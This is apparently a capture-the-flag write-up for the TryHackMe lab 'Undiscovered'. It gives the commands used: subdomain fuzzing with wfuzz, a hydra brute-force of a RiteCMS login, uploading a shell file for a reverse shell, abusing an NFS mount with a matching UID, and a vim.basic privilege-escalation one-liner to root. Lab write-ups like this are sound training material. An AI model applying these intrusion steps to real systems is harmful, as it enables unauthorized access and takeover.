Write-up for Tryhackme room Undiscovered.
Difficulty Level – Medium
Start with nmap scan as usual.
nmap -A -oN initial $IP
data:image/s3,"s3://crabby-images/d89d5/d89d57ab1f99f6eeb141c766824cf0f52bdaf705" alt=""
after that i tried directory brute-force with gobuster but no luck, since we add the domain name to our “/etc/hosts” maybe its something to do with sub-domains.
using “wfuzz” we can brute-force subdomain
wfuzz -c -f sub-lists.txt -w /opt/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://undiscovered.thm' -H "Host: FUZZ.undiscovered.thm" --hc --hw 290
data:image/s3,"s3://crabby-images/b0fc4/b0fc411a90a23c9ed16dc1eda05803734342bc6e" alt=""
now we need to add those sub domain to “/etc/hosts” to access.
data:image/s3,"s3://crabby-images/9595b/9595baea17baf5252cc26a4594bf9e147e61a148" alt=""
when we go to manager.undiscovered.thm we can see CMS type and version, with those details we can search for exploit available in Exploit Database
i found these 2 vulnerable exploits.
- RiteCMS 2.2.1 – Remote Code Execution (Authenticated)
- RiteCMS 2.2.1 – Authenticated Remote Code Execution
according to exploit database if we able to access “http://website/CMS” we can find login panel with luck using default credential we can login.
so to do that i wrote bash script,
#!/bin/bash
cat sub-lists.txt | while read line; do
curl "http://$line.undiscovered.thm/cms"
done
data:image/s3,"s3://crabby-images/e42c0/e42c03fc8466d6b8c8b0e46975a924ae53638549" alt=""
we found the correct URL but unfortunately default password will not work so need to brute-force with hydra.
hydra -l admin -P /opt/rockyou.txt -f deliver.undiscovered.thm http-post-form "/cms/index.php:username=^USER^&userpw=^PASS^:User unknown or password wrong"
data:image/s3,"s3://crabby-images/a50ee/a50eea69e93b8f5369a4fa67b85b919d57d7231f" alt=""
we found the password now we can login and find a way to upload shell file and get reverse shell.
Administration => File Manager => Upload file
data:image/s3,"s3://crabby-images/f7e65/f7e651801f1c06885bf4e7b0254f77889b9aa6e9" alt=""
clicking file will execute the file and we get the reverse shell.
data:image/s3,"s3://crabby-images/5ffae/5ffae7b9b583773bbcd6a4e6e98d10e073a71cda" alt=""
we can enumerate with linpeas.sh we can see this detail.
data:image/s3,"s3://crabby-images/cbe21/cbe218a4bd3fffa5bc0571a7842964e8bdd1e6c4" alt=""
if we create william user in our PC using same id we could mount the home with VM
sudo adduser -u 3003 william
data:image/s3,"s3://crabby-images/31d39/31d39298c9a4effe836c6c72b491073e73dd8e4c" alt=""
to mount the folder
sudo mount -t nfs undiscovered.thm:/home/william/ /home/william/
data:image/s3,"s3://crabby-images/31a25/31a25fc2e9a7b7354a4e4542272bc1767e17e291" alt=""
first change william home folder executable by all.
chmod 777 /home/william
the “script” binary is SUID when we execute it read “admin.sh” when we analyze it we can notice we can give a parameter(file to read) since it belong to leonard we can try to read leonard ssh key.
data:image/s3,"s3://crabby-images/a3967/a3967732c401ec7111092fd21ab749fa9f5b30a5" alt=""
now login as user leonard
ssh -i id_rsa leonard@$IP
Privilege Escalation
again run the linpeas get more details as user leonard
data:image/s3,"s3://crabby-images/d9c71/d9c716d285f96ecc8e191faf86a4c541a0033c27" alt=""
“vim.basic” look suspicious so i went to checked the GTFOBINS, with suggested method we can escalate.
/usr/bin/vim.basic -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
data:image/s3,"s3://crabby-images/78b10/78b10f720ae64cd0739adb5dc1ceafddb4dcf9d2" alt=""
Finally Root!!
Hack the planet, spread the knowledge!!